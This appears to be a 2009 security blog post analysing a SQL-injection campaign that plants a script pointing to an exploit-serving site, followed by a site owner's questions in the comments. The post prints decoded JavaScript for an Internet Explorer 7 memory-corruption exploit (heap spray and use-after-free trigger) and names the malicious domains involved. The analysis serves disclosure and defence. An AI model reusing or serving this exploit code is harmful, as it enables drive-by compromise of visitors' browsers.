«
»

deabak.com/z.js

this is a new script that are being sql-injected.

z.js contains a iframe from www.893500.cn/2/index.htm

The index.htm contains links to several the typical variety of exploits. One of which 02.htm is a MS09-02 exploit.

The IE7 exploit is decoded as follows:

var b=unescape(“%”+”u”+”0″+”C”+”0″+”C”+”%”+”u”+”0″+”C”+”0″+”C”);
var test99=yumen;
var yumen=new Array();
Tameeeeee=unescape(ttt.replace(/Game/g,”\x25\x75″));
while(b.length<0×100000-(ttt.length*2+0×01020)/2){b+=b}var lh=b.substring(0,0×100000-(ttt.length*2+0×01020)/2);
for(i=0; i<0xC0; i++){yumen[i]=lh+Tameeeeee}CollectGarbage();
var s1=unescape(“%”+”u”+”0″+”b”+”0″+”b”+”%”+”u”+”0″+”b”+”0″+”b”+”kfkfkfkfkfkfkfkfkfkfkfkfk”);
var a1=new Array();
for(var x=0; x<1000; x++)a1.push(document.createElement(“img”));
function ok(){o1=document.createElement(“tbody”);
o1.click;
var o2=o1.cloneNode();
o1.clearAttributes();
o1=null;
CollectGarbage();
for(var x=0; x<a1.length; x++)a1[x].src=s1; o2.click}

This entry was posted on February 26, 2009 at 10:10 pm and is filed under sql injection . You can follow any responses to this entry through the RSS 2.0 feed You can leave a response, or trackback from your own site.

3 Responses to “deabak.com/z.js”

  1. Tina Says:
    February 27, 2009 at 3:28 am

    Hi, I just got this SQL injection to my database today. Can you tell me how do they inject this script? I’ve put code in to all variables passing through URL. But I still got this. If you can help, that’ll be great!

    Thanks in advance.

    Tina

    Reply
  2. Tina Says:
    February 28, 2009 at 2:07 am

    Thanks for your response. I have a question, is there any way the hacker can find out all files in the directory? I’ve put the code to prevent URL injection, but I have some hidden files which can only be accessed by registered user does not have the protection. So I wonder hacker might found those pages and attack it from there.

    Reply

Leave a Reply